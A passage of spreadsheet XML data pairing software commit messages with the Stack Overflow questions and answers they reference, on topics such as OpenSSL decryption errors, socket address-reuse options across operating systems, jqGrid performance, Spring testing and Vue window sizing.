Solution in SO: This message digital envelope routines: EVP_DecryptFInal_ex: bad decrypt can also occur when you encrypt and decrypt with an incompatible versions of openssl.
The issue I was having was that I was encrypting on Windows which had version 1.1.0 and then decrypting on a generic Linux system which had 1.0.2g.
It is not a very helpful error message!
Working solution:
A possible solution from @AndrewSavinykh that worked for many (see the comments):
Default digest has changed between those versions from md5 to sha256. One can specify the default digest on the command line as -md sha256 or -md md5 respe</t>
  </si>
  <si>
    <t>This message digital envelope routines: EVP_DecryptFInal_ex: bad decrypt can also occur when you encrypt and decrypt with an incompatible versions of openssl.
The issue I was having was that I was encrypting on Windows which had version 1.1.0 and then decrypting on a generic Linux system which had 1.0.2g.
It is not a very helpful error message!
Working solution:
A possible solution from @AndrewSavinykh that worked for many (see the comments):
Default digest has changed between those versions from md5 to sha256. One can specify the default digest on the command line as -md sha256 or -md md5 respectively</t>
  </si>
  <si>
    <t xml:space="preserve">Here's my new project: an open canvas, right in front of me. In a few days, I will start to code a big web application. It will start small, with few modules, only myself as developer and engineer, but hopefully it will grow and grow.
Even though I am an active Java Developer, It's been a while since I last created a Web Application from scratch. At the time, Struts and J2EE was the way to go, but I see a lot of new frameworks, new libraries raising everyday. 
What I ask here is for your advice: what do you currently use for web development, why do you think it's relevant and if you would choose the same tools if you were starting on a new project. Everything counts: from tips on the UI to the backend. Common gotchas, patterns, everything you can think may be relevant.
I am a Java developer and, I am naturally inclined to do everything using Java-related technologies (J2SE, J2EE, Groovy, Grails, JRuby, Jython, JWhatever, and so on...), but please be welcome to post whatever you use, being related to Java or not.
My goal here is to build a bucket of what people are doing and why they are doing to help me evaluate which way should I go, and which I shouldn't - and why. After all, it's not everyday that you have such freedom to decide.
Thanks in advance!
</t>
  </si>
  <si>
    <t>C187</t>
  </si>
  <si>
    <t>socket: set SO_REUSEPORT option
This commit adds the option of setting SO_REUSEPORT socket option in
linux_uring backend.
For libuv/luv backend, it seems it is not easy to set it as yet. This
is related to another outstanding issue related to SO_REUSEADDR
option in libuv backend. Perhaps once luv releases luv-unix, we can
revisit this issue again. For now in-order to ensure the repo builds
I have followed a similar approach as SO_REUSEADDR, i.e. dummy
function `luv_reuse_port` analogous to `luv_resuse_addr`.
SO_REUSEPORT can be used to build scalable, high performance network
servers in linux version 3.9 and over. This is so because reuseport
is used to enable socket sharding on multiple threads or child
processes. Listening sockets with SO_REUSEPORT enabled are further
load balanced by the kernel; so we get a performant load balancer
for free.
References:
https://www.nginx.com/blog/socket-sharding-nginx-release-1-9-1/
https://stackoverflow.com/questions/14388706/how-do-so-reuseaddr-and-so-reuseport-differ
Signed-off-by: Bikal Lem &lt;gbikal+git@gmail.com&gt;</t>
  </si>
  <si>
    <t>Welcome to the wonderful world of portability... or rather the lack of it. Before we start analyzing these two options in detail and take a deeper look how different operating systems handle them, it should be noted that the BSD socket implementation is the mother of all socket implementations. Basically all other systems copied the BSD socket implementation at some point in time (or at least its interfaces) and then started evolving it on their own. Of course the BSD socket implementation was evolved as well at the same time and thus systems that copied it later got features that were lacking in systems that copied it earlier. Understanding the BSD socket implementation is the key to understanding all other socket implementations, so you should read about it even if you don't care to ever write code for a BSD system.
There are a couple of basics you should know before we look at these two options. A TCP/UDP connection is identified by a tuple of five values:
{&lt;protocol&gt;, &lt;src addr&gt;, &lt;src port&gt;, &lt;dest addr&gt;, &lt;dest port&gt;}
Any unique combination of these values identifies a connection. As a result, no two connections can have the same five values, otherwise the system would not be able to distinguish these connections any longer.
The protocol of a socket is set when a socket is created with the
socket()
function. The source address and port are set with the
bind()
function. The destination address and port are set with the
connect()
function. Since UDP is a connectionless protocol, UDP sockets can be used without connecting them. Yet it is allowed to connect them and in some cases very advantageous for your code and general application design. In connectionless mode, UDP sockets that were not explicitly bound when data is sent over them for the first time are usually automatically bound by the system, as an unbound UDP socket cannot receive any (reply) data. Same is true for an unbound TCP socket, it is automatically bound before it will be connected.
If you explicitly bind a socket, it is possible to bind it to port
0
, which means "any port". Since a socket cannot really be bound to all existing ports, the system will have to choose a specific port itself in that case (usually from a predefined, OS specific range of source ports). A similar wildcard exists for the source address, which can be "any address" (
0.0.0.0
in case of IPv4 and
::
in case of IPv6). Unlike in case of ports, a socket can really be bound to "any address" which means "all source IP addresses of all local interfaces". If the socket is connected later on, the system has to choose a specific source IP address, since a socket cannot be connected and at the same time be bound to any local IP address. Depending on the destination address and the content of the routing table, the system will pick an appropriate source address and replace the "any" binding with a binding to the chosen source IP address.
By default, no two sockets can be bound to the same combination of source address and source port. As long as the source port is different, the source address is actually irrelevant. Binding
socketA
to
ipA:portA
and
socketB
to
ipB:portB
is always possible if
ipA != ipB
holds true, even when
portA == portB
. E.g.
socketA
belongs to a FTP server program and is bound to
192.168.0.1:21
and
socketB
belongs to another FTP server program and is bound to
10.0.0.1:21
, both bindings will succeed. Keep in mind, though, that a socket may be locally bound to "any address". If a socket is bound to
0.0.0.0:21
, it is bound to all existing local addresses at the same time and in that case no other socket can be bound to port
21
, regardless which specific IP address it tries to bind to, as
0.0.0.0
conflicts with all existing local IP addresses.
Anything said so far is pretty much equal for all major operating system. Things start to get OS specific when address reuse comes into play. We start with BSD, since as I said above, it is the mother of all socket implementations.
BSD
SO_REUSEADDR
If
SO_REUSEADDR
is enabled on a socket prior to binding it, the socket can be successfully bound unless there is a conflict with another socket bound to
exactly
the same combination of source address and port. Now you may wonder how is that any different than before? The keyword is "exactly".
SO_REUSEADDR
mainly changes the way how wildcard addresses ("any IP address") are treated when searching for conflicts.
Without
SO_REUSEADDR
, binding
socketA
to
0.0.0.0:21
and then binding
socketB
to
192.168.0.1:21
will fail (with error
EADDRINUSE
), since 0.0.0.0 means "any local IP address", thus all local IP addresses are considered in use by this socket and this includes
192.168.0.1
, too. With
SO_REUSEADDR
it will succeed, since
0.0.0.0
and
192.168.0.1
are
not exactly
the same address, one is a wildcard for all local addresses and the other one is a very specific local address. Note that the statement above is true regardless in which order
socketA
and
socketB
are bound; without
SO_REUSEADDR
it will always fail, with
SO_REUSEADDR
it will always succeed.
To give you a better overview, let's make a table here and list all possible combinations:
SO_REUSEADDR       socketA        socketB       Result
---------------------------------------------------------------------
  ON/OFF       192.168.0.1:21   192.168.0.1:21    Error (EADDRINUSE)
  ON/OFF       192.168.0.1:21      10.0.0.1:21    OK
  ON/OFF          10.0.0.1:21   192.168.0.1:21    OK
   OFF             0.0.0.0:21   192.168.1.0:21    Error (EADDRINUSE)
   OFF         192.168.1.0:21       0.0.0.0:21    Error (EADDRINUSE)
   ON              0.0.0.0:21   192.168.1.0:21    OK
   ON          192.168.1.0:21       0.0.0.0:21    OK
  ON/OFF           0.0.0.0:21       0.0.0.0:21    Error (EADDRINUSE)
The table above assumes that
socketA
has already been successfully bound to the address given for
socketA
, then
socketB
is created, either gets
SO_REUSEADDR
set or not, and finally is bound to the address given for
socketB
.
Result
is the result of the bind operation for
socketB
. If the first column says
ON/OFF
, the value of
SO_REUSEADDR
is irrelevant to the result.
Okay,
SO_REUSEADDR
has an effect on wildcard addresses, good to know. Yet that isn't its only effect it has. There is another well known effect which is also the reason why most people use
SO_REUSEADDR
in server programs in the first place. For the other important use of this option we have to take a deeper look on how the TCP protocol works.
If a TCP socket is being closed, normally a 3-way handshake is performed; the sequence is called
FIN-ACK
. The problem here is, that the last ACK of that sequence may have arrived on the other side or it may not have arrived and only if it has, the other side also considers the socket as being fully closed. To prevent re-using an address+port combination, that may still be considered open by some remote peer, the system will not immediately consider a socket as dead after sending the last
ACK
but instead put the socket into a state commonly referred to as
TIME_WAIT
. It can be in that state for minutes (system dependent setting). On most systems you can get around that state by enabling lingering and setting a linger time of zero1 but there is no guarantee that this is always possible, that the system will always honor this request, and even if the system honors it, this causes the socket to be closed by a reset (
RST
), which is not always a great idea. To learn more about linger time, have a look at
my answer about this topic
.
The question is, how does the system treat a socket in state
TIME_WAIT
? If
SO_REUSEADDR
is not set, a socket in state
TIME_WAIT
is considered to still be bound to the source address and port and any attempt to bind a new socket to the same address and port will fail until the socket has really been closed. So don't expect that you can rebind the source address of a socket immediately after closing it. In most cases this will fail. However, if
SO_REUSEADDR
is set for the socket you are trying to bind, another socket bound to the same address and port in state
TIME_WAIT
is simply ignored, after all its already "half dead", and your socket can bind to exactly the same address without any problem. In that case it plays no role that the other socket may have exactly the same address and port. Note that binding a socket to exactly the same address and port as a dying socket in
TIME_WAIT
state can have unexpected, and usually undesired, side effects in case the other socket is still "at work", but that is beyond the scope of this answer and fortunately those side effects are rather rare in practice.
There is one final thing you should know about
SO_REUSEADDR
. Everything written above will work as long as the socket you want to bind to has address reuse enabled. It is not necessary that the other socket, the one which is already bound or is in a
TIME_WAIT
state, also had this flag set when it was bound. The code that decides if the bind will succeed or fail only inspects the
SO_REUSEADDR
flag of the socket fed into the
bind()
call, for all other sockets inspected, this flag is not even looked at.
SO_REUSEPORT
SO_REUSEPORT
is what most people would expect
SO_REUSEADDR
to be. Basically,
SO_REUSEPORT
allows you to bind an arbitrary number of sockets to
exactly
the same source address and port as long as
all
prior bound sockets also had
SO_REUSEPORT
set before they were bound. If the first socket that is bound to an address and port does not have
SO_REUSEPORT
set, no other socket can be bound to exactly the same address and port, regardless if this other socket has
SO_REUSEPORT
set or not, until the first socket releases its binding again. Unlike in case of
SO_REUSEADDR
the code handling
SO_REUSEPORT
will not only verify that the currently bound socket has
SO_REUSEPORT
set but it will also verify that the socket with a conflicting address and port had
SO_REUSEPORT
set when it was bound.
SO_REUSEPORT
does not imply
SO_REUSEADDR
. This means if a socket did not have
SO_REUSEPORT
set when it was bound and another socket has
SO_REUSEPORT
set when it is bound to exactly the same address and port, the bind fails, which is expected, but it also fails if the other socket is already dying and is in
TIME_WAIT
state. To be able to bind a socket to the same addresses and port as another socket in
TIME_WAIT
state requires either
SO_REUSEADDR
to be set on that socket or
SO_REUSEPORT
must have been set
on both
sockets prior to binding them. Of course it is allowed to set both,
SO_REUSEPORT
and
SO_REUSEADDR
, on a socket.
There is not much more to say about
SO_REUSEPORT
other than that it was added later than
SO_REUSEADDR
, that's why you will not find it in many socket implementations of other systems, which "forked" the BSD code before this option was added, and that there was no way to bind two sockets to exactly the same socket address in BSD prior to this option.
Connect() Returning EADDRINUSE?
Most people know that
bind()
may fail with the error
EADDRINUSE
, however, when you start playing around with address reuse, you may run into the strange situation that
connect()
fails with that error as well. How can this be? How can a remote address, after all that's what connect adds to a socket, be already in use? Connecting multiple sockets to exactly the same remote address has never been a problem before, so what's going wrong here?
As I said on the very top of my reply, a connection is defined by a tuple of five values, remember? And I also said, that these five values must be unique otherwise the system cannot distinguish two connections any longer, right? Well, with address reuse, you can bind two sockets of the same protocol to the same source address and port. That means three of those five values are already the same for these two sockets. If you now try to connect both of these sockets also to the same destination address and port, you would create two connected sockets, whose tuples are absolutely identical. This cannot work, at least not for TCP connections (UDP connections are no real connections anyway). If data arrived for either one of the two connections, the system could not tell which connection the data belongs to. At least the destination address or destination port must be different for either connection, so that the system has no problem to identify to which connection incoming data belongs to.
So if you bind two sockets of the same protocol to the same source address and port and try to connect them both to the same destination address and port,
connect()
will actually fail with the error
EADDRINUSE
for the second socket you try to connect, which means that a socket with an identical tuple of five values is already connected.
Multicast Addresses
Most people ignore the fact that multicast addresses exist, but they do exist. While unicast addresses are used for one-to-one communication, multicast addresses are used for one-to-many communication. Most people got aware of multicast addresses when they learned about IPv6 but multicast addresses also existed in IPv4, even though this feature was never widely used on the public Internet.
The meaning of
SO_REUSEADDR
changes for multicast addresses as it allows multiple sockets to be bound to exactly the same combination of source multicast address and port. In other words, for multicast addresses
SO_REUSEADDR
behaves exactly as
SO_REUSEPORT
for unicast addresses. Actually, the code treats
SO_REUSEADDR
and
SO_REUSEPORT
identically for multicast addresses, that means you could say that
SO_REUSEADDR
implies
SO_REUSEPORT
for all multicast addresses and the other way round.
FreeBSD/OpenBSD/NetBSD
All these are rather late forks of the original BSD code, that's why they all three offer the same options as BSD and they also behave the same way as in BSD.
macOS (MacOS X)
At its core, macOS is simply a BSD-style UNIX named "
Darwin
", based on a rather late fork of the BSD code (BSD 4.3), which was then later on even re-synchronized with the (at that time current) FreeBSD 5 code base for the Mac OS 10.3 release, so that Apple could gain full POSIX compliance (macOS is POSIX certified). Despite having a microkernel at its core ("
Mach
"), the rest of the kernel ("
XNU
") is basically just a BSD kernel, and that's why macOS offers the same options as BSD and they also behave the same way as in BSD.
iOS / watchOS / tvOS
iOS is just a macOS fork with a slightly modified and trimmed kernel, somewhat stripped down user space toolset and a slightly different default framework set. watchOS and tvOS are iOS forks, that are stripped down even further (especially watchOS). To my best knowledge they all behave exactly as macOS does.
Linux
Linux &lt; 3.9
Prior to Linux 3.9, only the option
SO_REUSEADDR
existed. This option behaves generally the same as in BSD with two important exceptions:
As long as a listening (server) TCP socket is bound to a specific port, the
SO_REUSEADDR
option is entirely ignored for all sockets targeting that port. Binding a second socket to the same port is only possible if it was also possible in BSD without having
SO_REUSEADDR
set. E.g. you cannot bind to a wildcard address and then to a more specific one or the other way round, both is possible in BSD if you set
SO_REUSEADDR
. What you can do is you can bind to the same port and two different non-wildcard addresses, as that's always allowed. In this aspect Linux is more restrictive than BSD.
The second exception is that for client sockets, this option behaves exactly like
SO_REUSEPORT
in BSD, as long as both had this flag set before they were bound. The reason for allowing that was simply that it is important to be able to bind multiple sockets to exactly to the same UDP socket address for various protocols and as there used to be no
SO_REUSEPORT
prior to 3.9, the behavior of
SO_REUSEADDR
was altered accordingly to fill that gap. In that aspect Linux is less restrictive than BSD.
Linux &gt;= 3.9
Linux 3.9 added the option
SO_REUSEPORT
to Linux as well. This option behaves exactly like the option in BSD and allows binding to exactly the same address and port number as long as all sockets have this option set prior to binding them.
Yet, there are still two differences to
SO_REUSEPORT
on other systems:
To prevent "port hijacking", there is one special limitation:
All sockets that want to share the same address and port combination must belong to processes that share the same effective user ID!
So one user cannot "steal" ports of another user. This is some special magic to somewhat compensate for the missing
SO_EXCLBIND
/
SO_EXCLUSIVEADDRUSE
flags.
Additionally the kernel performs some "special magic" for
SO_REUSEPORT
sockets that isn't found in other operating systems: For UDP sockets, it tries to distribute datagrams evenly, for TCP listening sockets, it tries to distribute incoming connect requests (those accepted by calling
accept()
)  evenly across all the sockets that share the same address and port combination. Thus an application can easily open the same port in multiple child processes and then use
SO_REUSEPORT
to get a very inexpensive load balancing.
Android
Even though the whole Android system is somewhat different from most Linux distributions, at its core works a slightly modified Linux kernel, thus everything that applies to Linux should apply to Android as well.
Windows
Windows only knows the
SO_REUSEADDR
option, there is no
SO_REUSEPORT
. Setting
SO_REUSEADDR
on a socket in Windows behaves like setting
SO_REUSEPORT
and
SO_REUSEADDR
on a socket in BSD, with one exception:
Prior to Windows 2003, a socket with
SO_REUSEADDR
could always been bound to exactly the same source address and port as an already bound socket,
even if the other socket did not have this option set when it was bound
. This behavior allowed an application "to steal" the connected port of another application. Needless to say that this has major security implications!
Microsoft realized that and added another important socket option:
SO_EXCLUSIVEADDRUSE
. Setting
SO_EXCLUSIVEADDRUSE
on a socket makes sure that if the binding succeeds, the combination of source address and port is owned exclusively by this socket and no other socket can bind to them,
not even
if it has
SO_REUSEADDR
set.
This default behavior was changed first in Windows 2003, Microsoft calls that "Enhanced Socket Security" (funny name for a behavior that is default on all other major operating systems). For more details
just visit this page
. There are three tables: The first one shows the classic behavior (still in use when using compatibility modes!), the second one shows the behavior of Windows 2003 and up when the
bind()
calls are made by the same user, and the third one when the
bind()
calls are made by different users.
Solaris
Solaris is the successor of SunOS. SunOS was originally based on a fork of BSD, SunOS 5 and later was based on a fork of SVR4, however SVR4 is a merge of BSD, System V, and Xenix, so up to some degree Solaris is also a BSD fork, and a rather early one. As a result Solaris only knows
SO_REUSEADDR
, there is no
SO_REUSEPORT
. The
SO_REUSEADDR
behaves pretty much the same as it does in BSD. As far as I know there is no way to get the same behavior as
SO_REUSEPORT
in Solaris, that means it is not possible to bind two sockets to exactly the same address and port.
Similar to Windows, Solaris has an option to give a socket an exclusive binding. This option is named
SO_EXCLBIND
. If this option is set on a socket prior to binding it, setting
SO_REUSEADDR
on another socket has no effect if the two sockets are tested for an address conflict. E.g. if
socketA
is bound to a wildcard address and
socketB
has
SO_REUSEADDR
enabled and is bound to a non-wildcard address and the same port as
socketA
, this bind will normally succeed, unless
socketA
had
SO_EXCLBIND
enabled, in which case it will fail regardless the
SO_REUSEADDR
flag of
socketB
.
Other Systems
In case your system is not listed above, I wrote a little test program that you can use to find out how your system handles these two options.
Also if you think my results are wrong
, please first run that program before posting any comments and possibly making false claims.
All that the code requires to build is a bit POSIX API (for the network parts) and a C99 compiler (actually most non-C99 compiler will work as well as long as they offer
inttypes.h
and
stdbool.h
; e.g.
gcc
supported both long before offering full C99 support).
All that the program needs to run is that at least one interface in your system (other than the local interface) has an IP address assigned and that a default route is set which uses that interface. The program will gather that IP address and use it as the second "specific address".
It tests all possible combinations you can think of:
TCP and UDP protocol
Normal sockets, listen (server) sockets, multicast sockets
SO_REUSEADDR
set on socket1, socket2, or both sockets
SO_REUSEPORT
set on socket1, socket2, or both sockets
All address combinations you can make out of
0.0.0.0
(wildcard),
127.0.0.1
(specific address), and the second specific address found at your primary interface (for multicast it's just
224.1.2.3
in all tests)
and prints the results in a nice table. It will also work on systems that don't know
SO_REUSEPORT
, in which case this option is simply not tested.
What the program cannot easily test is how
SO_REUSEADDR
acts on sockets in
TIME_WAIT
state as it's very tricky to force and keep a socket in that state. Fortunately most operating systems seems to simply behave like BSD here and most of the time programmers can simply ignore the existence of that state.
Here's the code
(I cannot include it here, answers have a size limit and the code would push this reply over the limit).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying write a function that will delete variables given a list of strings of those variables' names. I'm trying this:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;def delVars(ts):
    for s in ts:
        st = &amp;quot;del %s&amp;quot; % s
        print(st)
        try:
            exec(st, globals(), locals())
        except Exception as e:
            print(e)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But &lt;code&gt;except&lt;/code&gt; is always thrown: &lt;code&gt;name 'var_name' is not defined&lt;/code&gt;, presumably because it's out-of-scope.&lt;/p&gt;
&lt;p&gt;But why is this? I'm passing &lt;code&gt;globals()&lt;/code&gt; to &lt;code&gt;exec()&lt;/code&gt;, so it has access to variables outside the function scope.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C188</t>
  </si>
  <si>
    <t>fix loginIntercepter bug.
http://stackoverflow.com/questions/3230633/how-to-register-handler-interceptors-with-spring-mvc-3-0</t>
  </si>
  <si>
    <t>By default, Spring will register a BeanNameUrlHandlerMapping, and a DefaultAnnotationHandlerMapping, without any explicit config required.
If you define your own HandlerMapping beans, then the default ones will not be registered, and you'll just get the explicitly declared ones.
So far, so good.
The problem comes when you add &lt;mvc:annotation-driven/&gt; to the mix. This also declares its own DefaultAnnotationHandlerMapping, which replaces the defaults. However, if you also declare your own one, then you end up with two. Since they are consulted in order of declaration, this usually means the one registered by &lt;mvc:annotation-driven/&gt; gets called first, and your own one gets ignored.
It would be better if the DefaultAnnotationHandlerMapping registered by &lt;mvc:annotation-driven/&gt; acted like the default one, i.e. if explicitly declared ones took precedence, but that's not the way they wrote it.
My current preference is to not use &lt;mvc:annotation-driven/&gt; at all, it's too confusing, and too unpredictable when mixed with other config options. It doesn't really do anything especially complex, it's not difficult or verbose to explicitly add the stuff that it does for you, and the end result is easier to follow.</t>
  </si>
  <si>
    <t xml:space="preserve">I posted a [external-link] on how scalable linq is. There were so many different views on what scalability actually meant in some recent conversations, so it has sparked me to ask this question as well. What does scalability mean to you?
</t>
  </si>
  <si>
    <t>C189</t>
  </si>
  <si>
    <t>Improving performance of loading large local grids
I described the problem in [the bug report](http://www.trirand.com/blog/?page_id=393/bugs/improving-performance-of-loading-local-data-in-jqgrid) and [the answer](http://stackoverflow.com/a/25532422/315935).</t>
  </si>
  <si>
    <t>I analysed process of loading local grid with 90,000 unsorted rows and have found very funny bottleneck which one can easy overcome. First of all here is the demo which works quickly and here is almost the same demo which works much slowly especially in IE.
The most time of loading jqGrid get the line of jqGrid code directly at the beggining:
var p = $.extend(true,{
    // there are here different default values of jqGrid parameters
}, $.jgrid.defaults, pin || {});
Because one uses true as the first parameter then jQuery makes full copy of the data and it works slowly (why? It's another pure jQuery question).
As a workaround I suggest to set no data parameter during creating the grid. In the case the default parameter data: [] will be used. Instead of that one can set data inside of onInitGrid callback:
$("#list").jqGrid({
    //data: gridData,
    datatype: "local",
    ....
    onInitGrid: function () {
        // get reference to parameters
        var p = $(this).jqGrid("getGridParam");
        // set data parameter
        p.data = gridData;
    }
});
As the result the performance of loading of the grid will become much better.
I will post later my suggestions to trirand how to make small change of the code of jqGrid to improve the performance of jqGrid in the case. What I suggest is very simple. One can save data parameter in a variable, then call var p = $.extend(true,{...}); and then set data parameter directly in p variable
	// save local data array in temporary variable and remove from input parameters
	// to improve performance
	var localData;
	if (pin != null &amp;&amp; pin.data !== undefined) {
		localData = pin.data;
		pin.data = [];
	}
	var p = $.extend(true,{
		// there are here different default values of jqGrid parameters
	}, $.jgrid.defaults, pin || {});
	if (localData !== undefined) {
		p.data = localData;
	}
The demo uses the fixed code of jqGrid and it works quickly.
UPDATED: The pull request which I posted to trirand is already merged to the main code of jqGrid on github (see more in the bug report). So the next version of jqGrid (version higher as 4.6.0) won't have the described problem.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Spring 3.4.1, Java 21 and the related Mockito 5.14.2.&lt;/p&gt;
&lt;p&gt;I have this simple interface:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Operation(
    operationId = &amp;quot;getUsers&amp;quot;,
    summary = &amp;quot;Gets all User&amp;quot;,
    description = &amp;quot;Gets all users present.&amp;quot;,
    tags = { &amp;quot;User&amp;quot; },
    responses = {
        @ApiResponse(responseCode = &amp;quot;200&amp;quot;, description = &amp;quot;Successful operation&amp;quot;, content = {
            @Content(mediaType = &amp;quot;application/json&amp;quot;, array = @ArraySchema(schema = @Schema(implementation = User.class))),
            @Content(mediaType = &amp;quot;application/xml&amp;quot;, array = @ArraySchema(schema = @Schema(implementation = User.class)))
        }),
        @ApiResponse(responseCode = &amp;quot;404&amp;quot;, description = &amp;quot;Users not found&amp;quot;),
        @ApiResponse(responseCode = &amp;quot;500&amp;quot;, description = &amp;quot;Internal Server Error&amp;quot;, content = {
            @Content(mediaType = &amp;quot;application/json&amp;quot;, schema = @Schema(implementation = ApiError.class)),
            @Content(mediaType = &amp;quot;application/xml&amp;quot;, schema = @Schema(implementation = ApiError.class))
        })
    }
)
@GetMapping(
    value = &amp;quot;/users&amp;quot;,
    produces = { &amp;quot;application/json&amp;quot;, &amp;quot;application/xml&amp;quot; }
)
ResponseEntity&amp;lt;Page&amp;lt;User&amp;gt;&amp;gt; getUsers(
    @ParameterObject final Pageable pageable
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the implemetation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Override
public ResponseEntity&amp;lt;Page&amp;lt;User&amp;gt;&amp;gt; getUsers(Pageable pageable) {
    return new ResponseEntity&amp;lt;&amp;gt;(userService.findAll(pageable), HttpStatus.OK);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I write a simple Test class as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@WebMvcTest(controllers = UsersApi.class)
@AutoConfigureMockMvc(addFilters = false)
@ExtendWith(MockitoExtension.class)
class UserResourceTest {
  @Autowired
  private MockMvc mockMvc;
  @Autowired
  private ObjectMapper objectMapper;
  @MockitoBean
  private UserService userService;
  @Test
  void test1() throws Exception {
    List&amp;lt;User&amp;gt; list = List.of(
            new User(1L, &amp;quot;Sergio&amp;quot;, &amp;quot;Lima&amp;quot;, &amp;quot;s.lima@hotmail.it&amp;quot;, &amp;quot;s.lima@hotmail.it&amp;quot;, List.of(&amp;quot;ADMIN&amp;quot;)),
            new User(2L, &amp;quot;Viktor&amp;quot;, &amp;quot;Nicola&amp;quot;, &amp;quot;v.nicola@hotmail.it&amp;quot;, &amp;quot;v.nicola@hotmail.it&amp;quot;, List.of(&amp;quot;ADMIN&amp;quot;))
    );
    Pageable pageable = PageRequest.of(0, 10);
    Page&amp;lt;User&amp;gt; result = new PageImpl&amp;lt;&amp;gt;(list, pageable, list.size());
    Mockito.when(userService.findAll(pageable)).thenReturn(result);
    System.out.println(result.getContent());
    mockMvc.perform(get(&amp;quot;/api/v1/users&amp;quot;)
                    .contentType(MediaType.APPLICATION_JSON))
            .andExpectAll(
                    status().isOk(),
                    content().json(objectMapper.writeValueAsString(result.getContent()))
            );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I &lt;code&gt;sys.out&lt;/code&gt; the result I can see a correct JSON (indented) with the two User created at the beginning of the Test but if I execute it I obtain the follow error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java.lang.IllegalStateException: org.json.JSONException: Unparsable JSON string:
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have other test working and if I remove the &lt;code&gt;Pageable&lt;/code&gt; from this controller returning a &lt;code&gt;List&lt;/code&gt; and modify my test case this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    ..................
    Mockito.when(userService.findAll()).thenReturn(result);
    mockMvc.perform(get(&amp;quot;/api/v1/users&amp;quot;)
                    .contentType(MediaType.APPLICATION_JSON))
            .andExpectAll(
                    status().isOk(),
                    content().json(objectMapper.writeValueAsString(result))
            );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;everything goes fine. I have tried several way and googled around I found some partial solution like &lt;a href="https://github.com/thombergs/code-examples/blob/master/spring-boot/paging/src/test/java/io/reflectoring/paging/PagedControllerTest.java" rel="nofollow noreferrer"&gt;this&lt;/a&gt; but it is not for my purpose.&lt;/p&gt;
&lt;p&gt;I would like to check some information lile the content of the Page the max number of elements the order (if present) and something like that.
Any help is appreciate.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C19</t>
  </si>
  <si>
    <t>feature - add Swiper.js to pokedex info, refactor pokedex components 
and upgrade dependencies version
refactor index.html, pokedex components and composable
add pokemon basic info component
add pokemon count to config
remove unused component and image
upgrade dependencies version
https://stackoverflow.com/questions/47219272/how-can-i-use-window-size-in-vue-how-do-i-detect-the-soft-keyboard
 main</t>
  </si>
  <si>
    <t>To get the current window height of your browser as it changes, use this script:
new Vue({
  el: '#app',
  data() {
    return {
      windowHeight: window.innerHeight
    }
  },
  mounted() {
    this.$nextTick(() =&gt; {
      window.addEventListener('resize', this.onResize);
    })
  },
  beforeDestroy() { 
    window.removeEventListener('resize', this.onResize); 
  },
  methods: {  
    onResize() {
      this.windowHeight = window.innerHeight
    }
  }
});
To display the information, use:
&lt;div id="app"&gt;
 Current height: {{ windowHeight }}
&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two different areas in my application that need two quite different sets of permissions.  According to the best practices, I should only ask for the ones that I need, in each area.&lt;/p&gt;
&lt;p&gt;I'm familiar with the fact that Android will not display its Permission Request Dialog after the user refuses a permissions request a second time.&lt;/p&gt;
&lt;p&gt;I'm probably missing something... but if the user refuses one set of permissions twice, I cannot get Android to display the Permissions Request Dialog for the other, completely different set of permissions.&lt;/p&gt;
&lt;p&gt;FWIW, I'm using JetPack Compose so perhaps this is something to do with &lt;code&gt;rememberMultiplePermissionsState&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C190</t>
  </si>
  <si>
    <t>Updated homepage.php, Created test folder, Created calendar_ms folder
1. Used this bootstrap template to pretty up our home page. https://codepen.io/albizan/pen/mMWdWZ
Copied the CSS and JS folders
Also used facebook API to retrieve the last name of the person, an using the id, link it to their profile picture.
https://stackoverflow.com/questions/11442442/get-user-profile-picture-by-id</t>
  </si>
  <si>
    <t>http://graph.facebook.com/"
+ facebookId + "/picture?type=square
For instance:
http://graph.facebook.com/67563683055/picture?type=square
There are also more sizes besides "square". See
the docs
.
Update September 2020
As Facebook have updated their docs this method is not working anymore without a token. You need to append some kind of
access_token
. You can find further information and how to do it correctly in the fb docs to the
graph api of user picture
Requirements Change
This endpoint supports App-Scoped User IDs (ASID), User IDs (UID), and Page-Scoped User IDs (PSID). Currently you can query ASIDs and UIDs with no requirements. However, beginning October 24, 2020, an access token will be required for all UID-based queries. If you query a UID and thus must include a token:
use a User access token for Facebook Login authenticated requests
use a Page access token for page-scoped requests
use an App access token for server-side requests
use a Client access token for mobile or web client-side requests
Quote of fb docs</t>
  </si>
  <si>
    <t xml:space="preserve">How do large web sites which cannot be completely stateless achieve extreme scalability at the web tier?
There are sites like eBay and Amazon, which cannot be completely stateless, as they have a shopping cart or something like that. It isn't feasible to encode every item in the shopping cart into the URL, nor is it feasible to encode every item into a cookie and send it at every connection. So Amazon simply stores the session-id into the cookie which is being sent. So I understand that the scalability of the web tier of eBay and Amazon should be much harder than the scalability of the google search engine, where everything can be encoded restful into the URL. 
On the other hand, both eBay as well as Amazon scaled absolutely massively. Rumor is that there are some 15000 J2EE Application Servers at eBay.
How do these sites handle both: extreme scalability and statefulness? As the site is stateful, it isn't feasible to do a simple DNS-Balancing. So one would assume that these companies have a hardware based load balancer like BigIP, Netscaler or something like that, which is the sole device behind the single IP address of that site. This load balancer would decrypt the SSL (if encoded), inspect the cookie and decide depending on the session id of that cookie which application server holds the session of that customer.
But this just can't possibly work as no single load-balancer could possibly handle the load of thousands of application servers? I would imagine that even these hardware load balancers do not scale to such a level.
Also, the load-balancing is being done transparently for the user, i.e. the users are not forwarded to different addresses, but still all collectively stay at www.amazon.com the whole time.
